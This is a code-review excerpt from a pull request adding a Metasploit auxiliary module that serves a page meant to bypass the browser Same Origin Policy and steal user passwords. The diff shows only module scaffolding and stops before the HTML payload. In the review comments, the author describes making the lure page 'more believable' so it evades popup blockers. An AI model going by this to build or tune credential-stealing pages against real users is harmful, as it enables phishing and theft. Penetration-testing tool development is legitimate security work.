modules/auxiliary/gather/browser_sop_bypass.rb

```diff
@@ -0,0 +1,53 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+  include Msf::Exploit::Remote::HttpServer
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name'           => "Browser SOP Bypass",
+        'Description'    => %q(
+          This module do a server-redirect combined with a data-URI end up bypassing the Same Origin Policy,which leads to all kind of vulnerabilities like stealing user passwords.
+        ),
+        'License'        => MSF_LICENSE,
+        'Author'         => [
+          'Dhiraj Mishra',
+        ],
+        'References'     => [
+        ['URL', 'http://fr.0day.today/exploit/description/28434'],
+        ],
+        'DisclosureDate' => "Nov 09 2017",
+        'Actions'        => [[ 'WebServer' ]],
+        'PassiveActions' => [ 'WebServer' ],
+        'DefaultAction'  => 'WebServer'
+      )
+    )
+  end
+
+  def run
+    exploit # start http server
+  end
+
+  def setup
+    @html = %|
```

Comment:
This static HTML seems unlikely to actually trick anyone, as @jmartin-r7 mentioned. Also, it's specific to Google.

Again, I can't tell what behavior is being exploited here. It's not clear from the HTML here where the SOP bypass is.

Reply:
Why not an onload() instead of an onclick()?

Reply:
Answered my own questions here. Onload() will trigger anti-popups, and I've fixed up the HTML to be a little more believable, and allow the user to set their own if they like.